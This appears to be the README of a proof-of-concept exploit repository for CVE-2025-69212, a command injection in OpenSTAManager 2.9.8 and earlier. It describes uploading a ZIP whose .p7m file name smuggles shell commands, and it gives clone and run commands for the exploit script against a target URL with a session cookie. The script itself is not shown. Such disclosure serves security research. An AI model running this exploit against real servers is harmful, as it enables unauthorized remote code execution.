
استغلال لإثبات المفهوم لـ CVE-2025-69212، وهو حقن أوامر نظام التشغيل في OpenSTAManager. يقوم برفع ملف .p7m خبيث عبر ZIP لتنفيذ أوامر عشوائية على الخادم الهدف.
https://github.com/advisories/GHSA-25fp-8w8p-mx36
يحتوي OpenSTAManager (الإصدارات <= 2.9.8) على ثغرة حرجة في حقن الأوامر في نظام التشغيل (OS Command Injection) في وظيفة فك تشفير ملفات P7M (بتوقيع XML). يمكن للمهاجم المُصادَق عليه رفع ملف ZIP يحتوي على ملف .p7m باسم ضار لتنفيذ أوامر نظام عشوائية على الخادم.
git clone https://github.com/xorandd/CVE-2025-69212-PoC
cd CVE-2025-69212-PoC
python3 CVE-2025-69212.py -u http://target.com -C <PHPSESSID_cookie>
CVE-2025-69212.py [-h] -u URL -C COOKIE
options:
-h, --help show this help message and exit
-u, --url URL target url, eg http://127.0.0.1
-C, --cookie COOKIE cookie value